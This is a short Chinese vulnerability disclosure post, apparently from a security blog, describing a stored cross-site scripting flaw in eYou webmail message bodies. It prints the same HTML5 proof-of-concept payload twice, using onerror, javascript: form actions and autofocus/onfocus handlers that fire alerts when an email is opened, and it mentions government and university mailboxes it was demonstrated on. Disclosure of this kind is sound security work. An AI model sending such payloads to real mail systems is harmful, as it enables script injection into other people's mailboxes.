eYou邮件系统邮件正文存储型XSS(HTML5特性并需点击)

  • 内容
  • 评论
  • 相关

由于eyou版本号不同,下面测试代码的效果也有细微区别,但是存在漏洞原因相同。

测试代码:

<!--[if true]><img onerror=alert(1) src=--><form
action=javascript:alert(2)><input type=submit><input
autofocus onfocus=alert(3)><select autofocus
onfocus=alert(4)><textarea autofocus
onfocus=alert(5)>发送后打开,效果如图:

某党政机关邮箱:

QQ图片eyou120150121142357.jpg

QQ图片eyou220150121142545.jpg

某院校邮箱:

QQ图片eyou320150121142724.jpg

漏洞证明:

由于eyou版本号不同,下面测试代码的效果也有细微区别,但是存在漏洞原因相同。

测试代码:

<!--[if true]><img onerror=alert(1) src=--><form
action=javascript:alert(2)><input type=submit><input
autofocus onfocus=alert(3)><select autofocus
onfocus=alert(4)><textarea autofocus
onfocus=alert(5)>发送后打开,效果如图:

某党政机关邮箱:

QQ图片eyou120150121142357.jpg

QQ图片eyou220150121142545.jpg

某院校邮箱:

QQ图片eyou320150121142724.jpg

评论

4条评论

发表评论

电子邮件地址不会被公开。 必填项已用*标注

*

code